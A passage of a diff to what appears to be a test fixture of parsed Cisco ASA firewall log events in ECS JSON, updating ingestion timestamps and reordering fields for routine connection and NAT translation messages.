12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs", "code": "302014", "kind": "event", @@ -14475,7 +14475,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604695200Z", + "ingested": "2021-12-14T14:37:05.575535584Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs", "code": "302014", "kind": "event", 
@@ -14560,7 +14560,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604699900Z", + "ingested": "2021-12-14T14:37:05.575535918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs", "code": "302014", "kind": "event", @@ -14642,7 +14642,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604704500Z", + "ingested": "2021-12-14T14:37:05.575536253Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301", "code": "305011", "kind": "event", @@ -14721,7 +14721,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604708Z", + "ingested": "2021-12-14T14:37:05.575536591Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)", "code": "302013", "kind": "event", @@ -14804,7 +14804,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604712200Z", + "ingested": "2021-12-14T14:37:05.575536925Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302", "code": "305011", "kind": "event", @@ -14883,7 +14883,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604717700Z", + "ingested": "2021-12-14T14:37:05.575537258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)", "code": "302013", "kind": "event", 
@@ -14967,7 +14967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604722800Z", + "ingested": "2021-12-14T14:37:05.575537582Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -15052,7 +15052,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604726400Z", + "ingested": "2021-12-14T14:37:05.575537914Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150", "code": "302016", "kind": "event", @@ -15137,7 +15137,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604730500Z", + "ingested": "2021-12-14T14:37:05.575538244Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", @@ -15219,7 +15219,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604735300Z", + "ingested": "2021-12-14T14:37:05.575538597Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", @@ -15298,7 +15298,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604739100Z", + "ingested": "2021-12-14T14:37:05.575538929Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", 
@@ -15381,7 +15381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604743500Z", + "ingested": "2021-12-14T14:37:05.575539258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", @@ -15460,7 +15460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604748900Z", + "ingested": "2021-12-14T14:37:05.575539584Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", @@ -15546,7 +15546,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604754400Z", + "ingested": "2021-12-14T14:37:05.575539920Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", @@ -15631,7 +15631,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:32:20.604759800Z", + "ingested": "2021-12-14T14:37:05.575540263Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", @@ -15713,7 +15713,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604765100Z", + "ingested": "2021-12-14T14:37:05.575540616Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", 
@@ -15792,7 +15792,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604770500Z", + "ingested": "2021-12-14T14:37:05.575540949Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", @@ -15875,7 +15875,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604775800Z", + "ingested": "2021-12-14T14:37:05.575541284Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", @@ -15954,7 +15954,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604842100Z", + "ingested": "2021-12-14T14:37:05.575541629Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", @@ -15979,22 +15979,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16004,12 +15998,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604850100Z", + "ingested": "2021-12-14T14:37:05.575541959Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", @@ -16023,25 +16020,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16051,12 +16045,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604856100Z", + "ingested": "2021-12-14T14:37:05.575542292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", @@ -16070,25 +16067,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16098,12 +16092,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604861800Z", + "ingested": "2021-12-14T14:37:05.575542622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", @@ -16117,25 +16114,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16145,12 +16139,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604866300Z", + "ingested": "2021-12-14T14:37:05.575542962Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", @@ -16164,25 +16161,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16192,12 +16186,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604870900Z", + "ingested": "2021-12-14T14:37:05.575543295Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", @@ -16211,25 +16208,22 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16239,12 +16233,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604890300Z", + "ingested": "2021-12-14T14:37:05.575543626Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", @@ -16258,25 +16255,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16286,12 +16280,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604895Z", + "ingested": "2021-12-14T14:37:05.575543953Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", @@ -16305,25 +16302,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16333,12 +16327,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604900500Z", + "ingested": "2021-12-14T14:37:05.575544283Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604905900Z", + "ingested": "2021-12-14T14:37:05.575544615Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604911300Z", + "ingested": "2021-12-14T14:37:05.575544949Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604916700Z", + "ingested": "2021-12-14T14:37:05.575545283Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604922100Z", + "ingested": "2021-12-14T14:37:05.575545632Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604927400Z", + "ingested": "2021-12-14T14:37:05.575545961Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604932700Z", + "ingested": "2021-12-14T14:37:05.575546292Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604940300Z", + "ingested": "2021-12-14T14:37:05.575546627Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604946Z", + "ingested": "2021-12-14T14:37:05.575546957Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604951400Z", + "ingested": "2021-12-14T14:37:05.575547287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604956800Z", + "ingested": "2021-12-14T14:37:05.575547618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604962100Z", + "ingested": "2021-12-14T14:37:05.575547950Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604967600Z", + "ingested": "2021-12-14T14:37:05.575548294Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604971600Z", + "ingested": "2021-12-14T14:37:05.575548618Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604976100Z", + "ingested": "2021-12-14T14:37:05.575548956Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:32:20.604981200Z", + "ingested": "2021-12-14T14:37:05.575549287Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604985700Z", + "ingested": "2021-12-14T14:37:05.575549622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604989300Z", + "ingested": "2021-12-14T14:37:05.575550019Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", 
@@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604993500Z", + "ingested": "2021-12-14T14:37:05.575550395Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.604999Z", + "ingested": "2021-12-14T14:37:05.575550726Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17529,25 +17526,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605004500Z", + "ingested": "2021-12-14T14:37:05.575551063Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:20.605008100Z", + "ingested": "2021-12-14T14:37:05.575551408Z", "original": "Oct 10 2018 12:34:56 localhost 